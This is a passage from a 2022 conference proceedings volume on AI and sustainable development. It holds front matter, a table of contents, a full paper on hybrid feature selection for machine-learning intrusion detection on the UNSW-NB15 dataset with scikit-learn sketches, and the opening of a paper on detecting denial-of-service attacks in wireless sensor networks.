This book is the result of many combined efforts and substantial contributions, in particular from the General Chair of AI2SD'2022, Professor Mostafa EZZIYYANI of Abdelmalek Essaadi University, the distinguished Honorary Chair, Academician Janusz KACPRZYK of the Polish Academy of Sciences, and the Co-Chair, Professor Valentina EMILIA BALAS of Aurel Vlaicu University of Arad, Romania. The scientific contributions published in this book would not have been possible without the continuous help and collaboration of several actors, foremost among them the high patronage of His Majesty King Mohammed VI, who, in addition to his support of the production and scientific processes, provided all the logistical and technical means needed for the organization of the event and the publication of this book. Deep acknowledgment is addressed to the ENSAM school, represented by its director Pr. Khalid EL BIKRI, for his prestigious input; the valuable contributions of Pr. Wajih RHALEM, the faculty members, and their engineering students prepared fertile ground for the presentations and exchanges that resulted in the rigorous articles published in this volume. Great thanks go to the Islamic World Educational, Scientific and Cultural Organization (ICESCO), represented by its Director General Dr. Salim M. AL MALIK, for its collaboration, its support, and the distinguished welcome extended to the researchers and guests of the AI2SD'2022 conference. Appreciation is also addressed to Dr. Omar HALLI, advisor to the Director General of ICESCO, for his excellent role in coordinating the organization of the AI2SD'2022 edition at ICESCO. Finally, this dedication concerns the organizing committee managed by the General Chair, Professor Mostafa EZZIYYANI, the VIP coordinator, Professor Mohammed Rida ECH-CHARRAT, the scientific committee coordinator, Professor Loubna CHERRAT, the Ph.D. student organizing committee coordinator, Mr. Abderrahim EL YOUSSEFI, and all the professors and doctoral students, for their constant efforts in the organization, in maintaining relationships with researchers and collaborators, and in the publication process.

Contents

Two Levels Feature Selection Approach for Intrusion Detection System . . . 1
Aouatif Arqane, Omar Boutkhoum, Hicham Boukhriss, and Abdelmajid El Moutaouakkil

Method of Detecting Denial of Service Attacks in WSNs While Optimizing Network Life Span . . . 9
Rayri Yassine, Hatim Kharraz Aroussi, and Omar Zenzoum

Numerical Investigation into the Vertical Dynamic Behavior of Railway Tracks . . . 15
Rhylane Hajar, Zougari Ayoub, Ben Abdellah Abdellatif, and Ajdour Mounia

A Lightweight, Multi-layered Internet Filtering System . . . 29
Ali Sadiqui and Filali Moulay Rachid

Tracking Methods: Comprehensive Vision and Multiple Approaches . . . 40
Anass Ariss, Imane Ennejjai, Nassim Kharmoum, Wajih Rhalem, Soumia Ziti, and Mostafa Ezziyyani

Multi-blockchain Scheme Based on IoT and Smart Contracts in the Agricultural Field for Data Management . . . 55
Adil El Mane, Redouan Korchiyne, Omar Bencharef, and Younes Chihab

A Geometry-Based Analytical Model for Vehicular Visible Light Communication Channels . . . 64
Fatima Zahra Raissouni and Abdeljabbar Cherkaoui

Mapping Review of Research on Supply Chains Relocation . . . 73
Mouna Benfssahi, Nordine Sadki, Zoubir El Felsoufi, and Abdelhay Haddach

A Predictive Maintenance System Based on Vibration Analysis for Rotating Machinery Using Wireless Sensor Network (WSN) . . . 93
Imane El Boughardini, Meriem Hayani Mechkouri, and Kamal Reklaoui

A Comparative Study of Vulnerabilities Scanners for Web Applications: Nexpose vs Acunetix . . . 107
Bochra Labiad, Mariam Tanana, Abdelaziz Laaychi, and Abdelouahid Lyhyaoui


The Pulse-Shaping Filter Influence over the GFDM-Based System . . . . . . . . . . . . 118 Karima Ait Bouslam, Jamal Amadid, Radouane Iqdour, and Abdelouhab Zeroual Intrusion Detection Systems in Internet of Things Using Machine Learning Algorithms: A Comparative Study . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132 Hdidou Rachid, El Alami Mohamed, and Drissi Ahmed Generative Adversarial Networks for IoT Devices and Mobile Applications Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 145 Akram Chhaybi, Saiida Lazaar, and Mohammed Hassine The Indoor Localization System Based on Federated Learning and RSS Using UWB-OFDM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 152 Youssef Ibnatta, Mohammed Khaldoun, and Mohammed Sadik Artificial Intelligence for Smart Decision-Making in the Cities of the Future . . . 168 Youssef Mekki, Chouaib Moujahdi, Noureddine Assad, and Aziz Dahbi Performance Comparison of Localization Techniques in Term of Accuracy in Wireless Sensor Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179 Omar Arroub, Anouar Darif, Rachid Saadane, and Moly Driss Rahmani Fog Computing Model Based on Queuing Theory . . . . . . . . . . . . . . . . . . . . . . . . . . 191 Hibat Eallah Mohtadi, Mohamed Hanini, and Abdelkrim Haqiq From Firewall and Proxy to IBM QRadar SIEM . . . . . . . . . . . . . . . . . . . . . . . . . . . 199 Yasmine El Barhami, Hatim Kharraz Aroussi, and Chaimae Bensaid IoT-Based Approach for Wildfire Monitoring and Detection . . . . . . . . . . . . . . . . . 205 Mounir Grari, Idriss Idrissi, Mohammed Boukabous, Mimoun Yandouzi, Omar Moussaoui, Mostafa Azizi, and Mimoun Moussaoui A Decision-Making Model Based on a High-Level Ontology in Context of a Smart Home . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 214 Mohamed El Hamdouni, Yasser Mesmoudi, and Abderrahim Tahiri Integration of the Human Factor in the Management and Improvement of Performance of Production Systems: An Exploratory Literature Review . . . . . 220 Saloua Farouq, Reda Tajini, and Aziz Soulhi Securing Caesar Cryptography Using the 2D Geometry . . . . . . . . . . . . . . . . . . . . . 230 Fatima Zohra Ben Chakra, Hamza Touil, and Nabil El Akkad


A Comparative Study of Neural Networks Algorithms in Cyber-Security to Detect Domain Generation Algorithms Based on Mixed Classes of Data . . . . 240 Mohamed Hassaoui, Mohamed Hanini, and Said El Kafhali A Literature Review of Digital Technologies in Supply Chains . . . . . . . . . . . . . . . 251 Rachid El Gadrouri IoT Systems Security Based on Deep Learning: An Overview . . . . . . . . . . . . . . . . 266 El Mahdi Boumait, Ahmed Habbani, and Reda Mastrouri Deep Learning for Intrusion Detection in WoT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 272 Abdelaziz Laaychi, Mariam Tanana, Bochra Labiad, and Abdelouahid Lyhyaoui Artificial Intelligence Applications in the Global Supply Chain: Benefits and Challenges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282 Ikram Lebhar, Afaf Dadda, and Latifa Ezzine Fault Detection and Diagnosis in Condition-Based Predictive Maintenance . . . . 296 Oumaima El Hairech and Abdelouahid Lyhyaoui Agile Practices in Iteration Planning Process of Global Software Development . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 302 Hajar Lamsellak, Amal Khalil, Mohammed Ghaouth Belkasmi, and Mohammed Saber Sensitive Infrastructure Control Systems Cyber-Security: Literature Review . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 310 Tizniti Douae and Badir Hassan Design of SCMA Codebook Based on QAM Segmentation Constellation . . . . . . 320 Afilal Meriem, Hatim Anas, Latif Adnane, and Arioua Mounir Towards an Optimization Model for Outlier Detection in IoT-Enabled Smart Cities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 328 Moulay Lakbir Tahiri Alaoui, Meryam Belhiah, and Soumia Ziti Performance Analysis of Static and Dynamic Clustering Protocols for Wireless Sensor Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 339 El Idrissi Nezha and Najid Abdellah A Comprehensive Study of Integrating AI-Based Security Techniques on the Internet of Things . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 348 Adnan El Ahmadi, Otman Abdoun, and El Khatir Haimoudi


Semantic Segmentation Architecture for Text Detection with an Attention Module . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 359 Soufiane Naim and Noureddine Moumkine Car Damage Detection Based on Mask Scoring RCNN . . . . . . . . . . . . . . . . . . . . . 368 Farah Oubelkas, Lahcen Moumoun, and Abdellah Jamali Blockchain and IoT for Real-Time Decision Support for the Optimization of Maritime Freight Transport Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 377 M. H. Rziki, N. Mansour, A. E. Boukili, and M. B. Sedra MQTT Protocol Analysis According to QoS Levels and SSL Implementation for IoT Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 390 Mouna Boujrad, Mohammed Amine Kasmi, and Noura Ouerdi New Analytical Method to Classify Areas According to Signal Quality and Coverage of GSM Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 404 Ibrahim El Moudden, Abdellah Chentouf, Loubna Cherrat, Wajih Rhalem, Mohammed Rida Ech-charrat, and Mostafa Ezziyyani Neural Network Feature-Based System for Real-Time Road Condition Prediction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 418 Youssef Benmessaoud, Loubna Cherrat, Mohamed Rida Ech-charrat, and Mostafa Ezziyyani Author Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 433

Two Levels Feature Selection Approach for Intrusion Detection System

Aouatif Arqane(B), Omar Boutkhoum, Hicham Boukhriss, and Abdelmajid El Moutaouakkil

LAROSERI Laboratory, Chouaib Doukkali University, El Jadida, Morocco
[email protected], [email protected]

Abstract. Sophisticated, large-scale intrusions are among the most challenging threats that cybersecurity experts must deal with every day. Fortunately, the use of machine learning models with an intrusion detection system (IDS) contributes to enhancing and strengthening the defense mechanisms of networks and IT infrastructures. However, training a model with a large number of features, or with irrelevant ones, can significantly diminish the detection rate of attacks. Thus, many feature selection methods are applied to select the best feature subset. In this scope, this study presents a two-level feature selection technique, based on Correlation, Mutual Information, and ANOVA together with Sequential Forward Selection, to improve the performance of IDS. Furthermore, five notable machine learning classifiers were used to test the efficiency and reliability of this technique. In experiments performed on the UNSW-NB15 dataset, the achieved accuracy reached 99%, which outperforms other methods in recent research.

Keywords: Feature Selection · IDS · Correlation · Mutual Information · ANOVA · Sequential Forward Selection

1 Introduction

Because of the pervasive use of the internet in practically all fields, the number and intricacy of attacks have grown dramatically in recent years. It is therefore essential to deploy efficient technologies that constantly monitor the network and guarantee the integrity, confidentiality, and availability of sensitive information. As indicated by security managers, the Intrusion Detection System (IDS) is one of the most reliable tools for protecting systems and networks against potential security threats and unauthorized access. Typically, an IDS is a hardware appliance or software application that examines network traffic and raises an alert when malicious activities are detected. Based on the detection method, IDSs can be partitioned into two types: signature-based IDS and anomaly-based IDS. Signature-based IDS relies on pre-stored rules or patterns to instantly detect known types of attacks with a minimal false alarm rate; however, it is unable to recognize novel attack scenarios, which reduces its efficiency in real-world cases. On the other hand, anomaly-based IDS can detect new and unfamiliar threats by building an anomaly profile that describes the typical behavior of the system; any deviation from this profile is considered a possible threat. Nevertheless, it is prone to a high false alarm rate. Because of the limits of each type of IDS, security specialists suggest combining both kinds to create an efficient IDS.

Even though the IDS is considered a fundamental defense component for traditional networks, it faces many challenges in meeting the security requirements of modern networks, which are characterized by constantly growing threats and by the complexity and variety of deployed technologies (the Internet of Things, network virtualization, multi-cloud environments, etc.). Consequently, monitoring the enormous amount of network traffic produced by multiple connected devices requires advanced technologies such as artificial intelligence and, especially, Machine Learning (ML). However, the accuracy and detection performance of ML models decrease significantly when dealing with a great number of features in a dataset. Feature Selection (FS) is a well-known family of methods developed to reduce the number of features by removing redundant, irrelevant, and less informative ones while keeping the most important features. These methods are used to speed up the learning process, minimize the computational cost, and prevent over-fitting. Generally, FS methods can be grouped into four categories: filter [1], wrapper [2], hybrid [3], and embedded [4] methods. More detailed information about this subject is given in Sect. 3.

The contributions of this study are as follows:

• We propose a two-level method for FS that combines three filter-based methods and a wrapper-based method. The purpose of using the filter methods at the first level is to select the most important features according to each method, which shrinks the feature subset that the wrapper method then uses to build the optimal subset. In this way, we gain the precision and efficiency of wrapper methods while avoiding their main drawbacks: time and space complexity.
• Assessing the method with five different classifiers on the UNSW-NB15 dataset demonstrates its effectiveness in providing the most relevant features for the given problem and thus increasing the detection capabilities of the IDS.
• The accuracy achieved by our method with a Random Forest (RF) classifier compares favorably with numerous recent works on the same dataset.

2 Related Work

The authors of [5] focused on improving the detection rate of anomalous activities in IoT networks. They used the Recursive Feature Elimination (RFE) technique for FS and the Synthetic Minority Over-sampling Technique (SMOTE) to tackle the problem of imbalanced data. The experiments performed on the CICIDS2017 and UNSW-NB15 datasets showed promising results; however, there is a risk that the model overfits, since the specificity, precision, recall, and F1-score values reported for the CICIDS2017 dataset are all 100%. In [6], a genetic algorithm (GA) was used for FS along with a deep neural network in the detection step to design a general framework for network IDS. The overall performance is good, but the detection rate needs further improvement. The CorrCorr approach was proposed in [7] to overcome the problems of multivariate correlation-based IDS. This correlation-based method achieved better results than the Principal Component Analysis (PCA) technique; however, it does not remove redundant records, which means that performance can decrease on big datasets. In [8], a novel FS method inspired by the XGBoost algorithm was introduced. To evaluate the effectiveness of the obtained feature subset, the authors implemented five different ML algorithms: Logistic Regression (LR), Support Vector Machine (SVM), Decision Tree (DT), Artificial Neural Network (ANN), and k-Nearest-Neighbour (kNN). According to the experiments, XGBoost-ANN had the best performance, while XGBoost-DT and XGBoost-kNN showed improved performance on unseen data.
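As an illustration of the kind of pipeline used in [5], the sketch below combines RFE with SMOTE using scikit-learn and imbalanced-learn. It is not the cited authors' code: the X_train/y_train names, the RandomForest estimator, and the number of retained features are all assumptions made here for illustration.

```python
# Illustration of the RFE + SMOTE combination described in [5] (not the cited authors' code).
# Assumes a pandas DataFrame X_train and a binary label Series y_train.
from imblearn.over_sampling import SMOTE
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_selection import RFE


def rfe_with_smote(X_train, y_train, n_features=20):
    """Balance the classes with SMOTE, then keep n_features via recursive elimination."""
    X_res, y_res = SMOTE(random_state=0).fit_resample(X_train, y_train)
    rfe = RFE(RandomForestClassifier(n_estimators=100), n_features_to_select=n_features)
    rfe.fit(X_res, y_res)
    return list(X_train.columns[rfe.support_])
```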

3 Background on Feature Selection

In this section, we briefly introduce the filter and wrapper methods used to design our FS approach.

Filter methods use statistical measures, such as information, distance, dependency, and consistency, to assess the relationship between each feature and the target variable and thus classify the features as relevant or not. They offer better generalization, low computational complexity, and independence from the learning algorithm applied to the problem. Nonetheless, the resulting subset is not necessarily the optimal one. For this study, we used the three filter methods described below.

Pearson's correlation coefficient (PCC): a value in the range [-1, 1] that measures the linear relationship (correlation) between features and their classes. When two features are highly correlated, they most likely provide similar information about the target, so one of them can be dropped. It is worth mentioning that correlation is adequate only for metric variables.

Mutual Information (MI): the amount of information obtained about one random variable by observing another. In other words, MI is a non-negative measure of the dependence between two variables; a value of zero indicates that the variables are independent.

Analysis of Variance (ANOVA): a parametric statistical hypothesis test that checks whether two or more groups differ significantly from one another. For FS, it is used to identify features that are independent of the target: since they have no predictive power for the target, they can be eliminated.

Wrapper methods depend on ML algorithms to select the best feature subset. The features are fed to the chosen algorithm, which scores them during the training process and picks the most important subsets; the selected subsets are then validated with a technique such as cross-validation. Although these methods provide high-quality subsets, they are computationally costly and slower on large-scale datasets.

Sequential Forward Selection (SFS): an iterative method belonging to the greedy search algorithms. It starts with an empty feature subset, then iteratively adds new features and evaluates the performance of the model until adding more features no longer improves it. In this way, the obtained subset is the optimal one, containing the features most relevant to the problem.
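To make these definitions concrete, the following minimal sketch computes the three filter scores and runs a forward selection with scikit-learn. The DataFrame X, the label vector y, the wrapped RandomForest estimator, and the target subset size are assumptions for illustration, not the authors' published implementation.

```python
# Minimal sketch (not the authors' code): the three filter scores and SFS with scikit-learn.
# Assumes X is a numeric pandas DataFrame of features and y a binary label Series.
import numpy as np
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_selection import (SequentialFeatureSelector, f_classif,
                                        mutual_info_classif)


def filter_scores(X: pd.DataFrame, y: pd.Series) -> pd.DataFrame:
    """Per-feature scores for PCC, MI and ANOVA (higher = more relevant)."""
    pcc = X.apply(lambda col: abs(np.corrcoef(col, y)[0, 1]))    # |Pearson correlation|
    mi = pd.Series(mutual_info_classif(X, y), index=X.columns)   # mutual information
    anova = pd.Series(f_classif(X, y)[0], index=X.columns)       # ANOVA F-statistic
    return pd.DataFrame({"pcc": pcc, "mi": mi, "anova": anova})


def sfs_subset(X: pd.DataFrame, y: pd.Series, k: int = 8) -> list:
    """Greedy forward selection of k features around a RandomForest wrapper."""
    sfs = SequentialFeatureSelector(
        RandomForestClassifier(n_estimators=100, random_state=0),
        n_features_to_select=k, direction="forward", cv=3, scoring="accuracy")
    sfs.fit(X, y)
    return list(X.columns[sfs.get_support()])
```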

4 Proposed Approach

With the goal of strengthening the detection performance of the IDS and reducing false alerts, we propose a two-level FS technique for ML-based IDS. The detection framework of the proposed methodology mainly consists of the following phases.

Data pre-processing: the first stage cleans the dataset of noisy network traffic information and removes or replaces duplicate and missing values. Removing constant and redundant features is also necessary. The goal of this stage is to transform the raw data into a format more appropriate for modeling, because most captured network traffic is not suitable for ML processing as-is. The result of this process is a cleaned dataset.

Feature selection: this stage is the core of the suggested methodology. It combines the three filter-based FS methods (PCC, MI, and ANOVA) with a wrapper-based FS technique (SFS), executed in two steps or levels to obtain the most informative feature subset. In the first level, the system applies the three filter-based FS techniques individually to the cleaned dataset to obtain three different subsets. In the second level, the features of the three subsets are combined, ranked by their computed importance, and the top 50% are kept. The system then runs SFS on this reduced subset to choose the optimal feature subset containing the most relevant features.

Model training: our main purpose in this research is to provide an effective FS method that improves the detection rate of the IDS. We therefore implement and compare five different ML algorithms to evaluate the proposed approach (Fig. 1).
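The sketch below is one possible reading of the two-level procedure just described; the paper does not specify how the filter subsets are combined or how the importance ranking is computed, so the union of the subsets, the averaged normalized scores, and the per-filter subset size are assumptions. It reuses the filter_scores() and sfs_subset() helpers from the previous sketch.

```python
# A possible implementation of the two-level selection (an interpretation, not the published code).
# Level 1: each filter keeps its own top-k features.
# Level 2: the union is ranked by the average of the normalized filter scores,
#          the top 50% is kept, and SFS picks the final subset.
def two_level_selection(X, y, k_filter=20, final_k=8):
    scores = filter_scores(X, y)

    # Level 1: three individual filter-based subsets (k_filter is an assumption).
    subsets = [set(scores[col].nlargest(k_filter).index) for col in ("pcc", "mi", "anova")]

    # Level 2: combine the subsets and keep the top 50% by averaged normalized score.
    combined = sorted(set.union(*subsets))
    ranking = (scores.loc[combined] / scores.loc[combined].max()).mean(axis=1)
    top_half = ranking.nlargest(max(1, len(combined) // 2)).index.tolist()

    # Wrapper level: SFS over the reduced candidate set.
    return sfs_subset(X[top_half], y, k=final_k)
```

The point of the first level is exactly the one given in the Introduction: the filters cheaply shrink the candidate set so that the expensive wrapper search only has to explore a small number of features.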

5 Experimental Setup
In this section, the dataset, the FS approach, the algorithms for model training and the performance measurements are introduced. The proposed system is implemented and evaluated on a workstation running Windows 7, with 8 GB of RAM and an Intel CPU at 3.5 GHz.
Dataset: to train and test the performance of the model, the UNSW-NB15 dataset [9] was chosen. It consists of approximately 2,540,044 samples, divided into two partitions: the training set with 175,341 instances and the testing set with 82,332 instances. Each instance contains 49 features grouped into five subgroups called Basic features, Time features, Flow features, Content features, and Additional generated features. It also includes nine types of attack: Backdoors, Exploits, DoS, Fuzzers, Reconnaissance, Generic, Worms, Analysis, and Shellcode.
Data pre-processing: the data pre-processing for the dataset is performed with a script written in Python. During this step, irrelevant data was removed, and normalization, scaling, and encoding of categorical attributes were performed.
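The cleaning steps listed above could be sketched as follows; the exact rules of the authors' script are not given in the paper, so the label-column name, encoder, and scaler choices here are assumptions.

```python
# Illustrative pre-processing of the UNSW-NB15 CSV files (assumed details).
import pandas as pd
from sklearn.preprocessing import MinMaxScaler, LabelEncoder

def preprocess(df: pd.DataFrame, label_col: str = "label"):
    df = df.drop_duplicates().dropna()                  # duplicates / missing values
    df = df.loc[:, df.nunique() > 1]                    # drop constant features
    y = df.pop(label_col)                               # assumed name of the class column
    for col in df.select_dtypes(include="object"):      # encode categorical attributes
        df[col] = LabelEncoder().fit_transform(df[col])
    X = pd.DataFrame(MinMaxScaler().fit_transform(df),  # normalisation / scaling
                     columns=df.columns, index=df.index)
    return X, y
```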


Fig. 1. Workflow of the proposed approach.

Feature selection: during the FS process, we used a script written in Python along with the NumPy, Pandas, and Scikit-learn libraries.
Model training and validation: since this research focuses on FS, we prefer to use five well-known ML algorithms with the default parameters of the Scikit-learn library. The chosen ML algorithms are: SVM with kernel = 'rbf', DT with max_depth = 3, RF with n_estimators = 1000, kNN with k = 5, and Gradient Boosting (GB).
Performance metrics: the performance of the ML models is quantified by the following metrics: Accuracy, Precision, Recall and F-Score (F1).
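A compact sketch of the training and evaluation loop with the five classifiers and the parameters quoted above is shown below; how the train/test partitions are loaded is left out, since the dataset already provides them.

```python
# Illustrative training of the five classifiers with the parameters quoted above.
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score

MODELS = {
    "SVM": SVC(kernel="rbf"),
    "DT":  DecisionTreeClassifier(max_depth=3),
    "RF":  RandomForestClassifier(n_estimators=1000),
    "KNN": KNeighborsClassifier(n_neighbors=5),
    "GB":  GradientBoostingClassifier(),
}

def evaluate(X_train, y_train, X_test, y_test, features):
    """Fit each model on the selected features and print the four metrics."""
    for name, model in MODELS.items():
        model.fit(X_train[features], y_train)
        pred = model.predict(X_test[features])
        print(name,
              f"acc={accuracy_score(y_test, pred):.4f}",
              f"prec={precision_score(y_test, pred):.2f}",
              f"rec={recall_score(y_test, pred):.2f}",
              f"f1={f1_score(y_test, pred):.2f}")
```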

6 Results and Comparative Analysis
In this section, we present the results of the multiple experiments conducted on the UNSW-NB15 dataset. Then, we investigate in depth the performance of the proposed method and compare it with other studies in the literature.
6.1 Results and Discussion
During the first level of the FS process, we obtained three different feature subsets. The subsets obtained by PCC, MI and ANOVA consist of 18, 14, and 12 features, respectively. After the ranking and the SFS executed on these subsets, we obtained an optimal subset


Table 1. Obtained features by each step of feature selection

Method | Features names | Nb
PCC | dttl, sload, dload, swin, stcpb, dtcpb, smean, dmean, response_body_len, sjit, djit, stime, ltime, tcprtt, ct_state_ttl, is_ftp_login, ct_srv_src, ct_dst_ltm | 18
MI | stcpb, dmean, synack, smean, ackdat, ct_srv_srv, ct_state_ttl, ct_dst_ltm, ct_src_dport_ltm, response_body_len, ct_dst_sport_ltm, ct_src_ltm, rate, sbytes | 14
ANOVA | proto, dwin, dttl, dloss, sinpkt, swin, stcpb, dtcpb, ct_dst_ltm, dmean, service, is_sm_ips_ports | 12
SFS | proto, service, sbytes, rate, dload, sjit, djit, tcprtt | 8

composed of 8 features. Table 1 lists the number and names of the features obtained after each step. After several iterations of experiments, and according to the results, the use of the FS method improves the performance measures of almost all classifiers, except for GB, which shows the smallest improvement (Tables 2 and 3).

Table 2. Performance classification based on optimal features (8 features)

Classifier | Accuracy (%) | Precision | Recall | F1_score
SVM | 98.57 | 0.94 | 0.93 | 0.94
DT | 97.01 | 0.92 | 0.81 | 0.86
RF | 99.37 | 0.97 | 0.96 | 0.97
GB | 95.34 | 0.83 | 0.82 | 0.83
KNN | 95.40 | 0.96 | 0.97 | 0.97

Table 3. Performance classification based on original features (49 features)

Classifier | Accuracy (%) | Precision | Recall | F1_score
SVM | 96.47 | 0.96 | 0.81 | 0.91
DT | 95.03 | 0.94 | 0.85 | 0.88
RF | 96.76 | 0.85 | 0.89 | 0.90
GB | 95.14 | 0.89 | 0.79 | 0.84
KNN | 87.21 | 0.80 | 0.97 | 0.87

An interesting observation is that executing the RF classifier with the optimal feature subset gives a remarkable detection accuracy of 99.37% and promising values for precision, recall, and F1_score. Also, the accuracy of KNN increased considerably, from 87.21% to 95.40%, when using the most relevant features obtained by our method. However, we did not notice a great impact of this method on the GB classifier. The reason behind this result may be that this classifier relies on many attributes and parameters to optimize its performance, but in this experiment we chose to apply the minimum ones in order to evaluate the real efficiency of the proposed method. Tables 2 and 3 depict the performance measures obtained by implementing the aforementioned classifiers using 8 features and 49 features, respectively. Figure 2 illustrates the accuracy of the five classifiers with the proposed method (8 features) and without it (49 features). It is clearly visible that the use of the optimal feature subset enhances the detection accuracy of all classifiers, but in different proportions.

Fig. 2. Detection accuracy with and without using the FS method

6.2 Comparative Analysis
The comparison of the presented method with some recent papers in the literature shows that the RF classifier combined with the optimal selected features outperforms all other classifiers using different FS techniques (Table 4).

Table 4. Results comparison between the present method and related work.

Study | ML method | FS technique | Accuracy (%) | Precision | Recall
[5] | SVM | RFE* | 97 | 97 | 97
[6] | DNN** | Genetic algorithm | 98.11 | 98.10 | 98.10
[7] | – | CorrCorr | 93.22 | – | –
[8] | kNN | XGBoost | 94.73 | 80.31 | 95.09
Proposed method | RF | hybrid | 99.37 | 97.04 | 96.87

*RFE = Recursive Feature Elimination. **DNN = Deep neural network.


7 Conclusions and Future Work
The present work has demonstrated the importance of hybrid FS methods for enhancing the detection performance of IDS. Our system relies on an efficient FS method, composed of correlation, mutual information, ANOVA, and sequential forward selection, to minimize the feature set, together with well-known ML algorithms for the classification stage. According to our experiments conducted on the UNSW-NB15 dataset, the proposed FS method significantly enhanced the overall performance and provided higher accuracy rates for almost all tested classifiers. This method is principally developed for IoT devices to overcome the problem of limited execution resources when dealing with ML methods: minimizing the number of features means less training time and fewer computational resources. In future work, we intend to optimize the present FS method by combining other FS techniques. We also plan to evaluate its performance on several datasets and with multiple classifiers.

References
1. Sánchez-Maroño, N., Alonso-Betanzos, A., Tombilla-Sanromán, M.: Filter methods for feature selection – a comparative study. In: Yin, H., Tino, P., Corchado, E., Byrne, W., Yao, X. (eds.) IDEAL 2007. LNCS, vol. 4881, pp. 178–187. Springer, Heidelberg (2007). https://doi.org/10.1007/978-3-540-77226-2_19
2. Soto, A.J., Cecchini, R.L., Vazquez, G.E., Ponzoni, I.: A wrapper-based feature selection method for ADMET prediction using evolutionary computing. In: Marchiori, E., Moore, J.H. (eds.) EvoBIO 2008. LNCS, vol. 4973, pp. 188–199. Springer, Heidelberg (2008). https://doi.org/10.1007/978-3-540-78757-0_17
3. Aburomman, A.A., Reaz, M.B.I.: A survey of intrusion detection systems based on ensemble and hybrid classifiers. Comput. Secur. 65, 135–152 (2017). https://doi.org/10.1016/j.cose.2016.11.004
4. Yamada, S., Neshatian, K.: Comparison of embedded and wrapper approaches for feature selection in support vector machines. In: Nayak, A.C., Sharma, A. (eds.) PRICAI 2019. LNCS (LNAI), vol. 11671, pp. 149–161. Springer, Cham (2019). https://doi.org/10.1007/978-3-030-29911-8_12
5. Ullah, I., Mahmoud, Q.H.: A two-level hybrid model for anomalous activity detection in IoT networks. In: 2019 16th IEEE Annual Consumer Communications Networking Conference (CCNC), pp. 1–6 (2019)
6. Keserwani, P.K., Govil, M.C., Pilli, E.S.: An effective NIDS framework based on a comprehensive survey of feature optimization and classification techniques. Neural Comput. Appl. 35, 1–21 (2021). https://doi.org/10.1007/s00521-021-06093-5
7. Gottwalt, F., Chang, E., Dillon, T.: CorrCorr: a feature selection method for multivariate correlation network anomaly detection techniques. Comput. Secur. 83, 234–245 (2019). https://doi.org/10.1016/j.cose.2019.02.008
8. Kasongo, S.M., Sun, Y.: Performance analysis of intrusion detection systems using a feature selection method on the UNSW-NB15 dataset. J. Big Data 7(1), 1–20 (2020). https://doi.org/10.1186/s40537-020-00379-6
9. UNSW_NB15. https://kaggle.com/mrwellsdavid/unsw-nb15

Method of Detecting Denial of Service Attacks in WSNs While Optimizing Network Life Span Rayri Yassine(B) , Hatim Kharraz Aroussi, and Omar Zenzoum University Ibn Tofail, Kénitra, Morocco [email protected]

Abstract. The miniaturization of sensors, their increasingly low cost, the wide range of sensor types available, and the wireless communication medium used allow sensor networks to develop in several fields of application. Sensor networks can be very useful in many applications when it comes to collecting and processing information from the environment. In addition, these micro devices are today among the main components of the Internet of Things (IoT) paradigm. Several constraints hinder the proper functioning of wireless sensor networks and motivate a large part of the research problems in this field, in particular the energy and security constraints, which are fundamental problems. In sensor networks, it is essential that each sensor node and the base station can verify that the data received was sent by a trusted sender and not by an adversary who tricked legitimate nodes into accepting fake data. False data can change what can be predicted from the network, so data integrity must be maintained: the data must not be altered, and accurate data must reach the end user. In this paper, we tackle security problems in WSNs, focusing on protection against so-called "denial of service" attacks. The aim of the work presented is therefore to propose a set of effective methods for detecting and reacting to denial of service attacks, while saving or distributing the energy consumption of the sensors as well as possible, in order to extend the network's operating time as much as possible. Keywords: Wireless sensor · Routing · Security · Energy

1 Introduction
The Internet of Things is an interdependent system of mechanical and digital devices, objects, animals or people, with unique identifiers that allow data to be transferred over a network without the need for human-to-human or human-to-computer interaction. The IoT environment allows users to manage and optimize electronic and electrical equipment via the Internet. Most interactions are between computers and other electronic equipment that are connected to each other and exchange information between them. It also significantly increases the number of "objects" relative to the number of active Internet users. The IoT uses two types of elements to interact with the physical world: sensors and actuators. Sensors collect information from the physical world and


